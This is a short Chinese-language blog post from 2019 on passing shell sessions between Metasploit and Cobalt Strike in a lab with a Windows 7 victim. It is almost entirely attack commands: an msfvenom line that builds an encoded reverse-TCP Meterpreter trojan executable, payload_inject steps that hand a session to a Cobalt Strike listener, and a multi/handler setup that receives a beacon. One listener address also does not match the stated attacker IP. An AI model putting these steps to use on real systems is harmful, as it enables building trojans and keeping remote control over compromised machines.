cobalt strike和metasploit結合使用(互相傳遞shell會話
攻擊機 192.168.5.173 裝有msf和cs
受害機 192.168.5.179 win7
0x01 msf 派生 shell 給 Cobalt strike
Msfvenom生成木馬上線:
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=192.168.5.10 LPORT=4444 -f exe > test.exe
開啟cs
msf exploit(handler) > use exploit/windows/local/payload_inject
msf exploit(payload_inject) > set PAYLOAD windows/meterpreter/reverse_http
msf exploit(payload_inject) > set DisablePayloadHandler true
msf exploit(payload_inject) > set LHOST 192.168.5.173
msf exploit(payload_inject) > set LPORT 50050
msf exploit(payload_inject) > set SESSION 1
msf exploit(payload_inject) > exploit
0x02 Cobalt strike 派生 shell 給 MSF(前提有個beaconshell)
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.5.10
lhost => 192.168.5.10
msf exploit(handler) > set lport 4444
lport =>4444
msf exploit(handler) > exploit
之後使用Cobalt Strike建立一個
windows/foreign/reverse_tcp Listener
posted @ 2019-05-27 22:08 卿先生 閱讀(...) 評論(...) 編輯 收藏